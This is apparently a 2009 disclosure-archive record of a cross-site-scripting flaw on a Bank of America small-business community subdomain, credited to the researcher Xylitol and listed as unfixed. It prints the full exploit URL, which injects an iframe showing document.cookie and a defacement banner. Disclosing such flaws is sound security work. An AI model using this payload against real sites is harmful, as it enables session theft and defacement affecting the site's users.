Security researcher Xylitol, has submitted on 29/01/2009 a cross-site-scripting (XSS) vulnerability affecting smallbusinessonlinecommunity.bankofamerica.com, which at the time of submission ranked 402 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 29/01/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 29/01/2009 |
Date published: 29/01/2009 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Xylitol |
Domain: smallbusinessonlinecommunity.bankofamerica.com |
Category: XSS |
Pagerank: 402 |
|---|
URL: http://smallbusinessonlinecommunity.bankofamerica.com/search.jspa?q=%27%22%3E%3CIFRAME+SRC%3D%22java
script%3Aalert(document.cookie)%3B%22%3E%3C%2FIFRAME%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXSS+
by+Xylitol%3C%2FH1%3E%3C%2FM&resultTypes=BLOG_POST&resultTypes=DOCUMENT&resultTypes=MESSAGE&peopleEn
abled=true&dateRange=all&numResults=30&rankBy=10001 |
|
Click here to view the mirror
|
|
|
| 
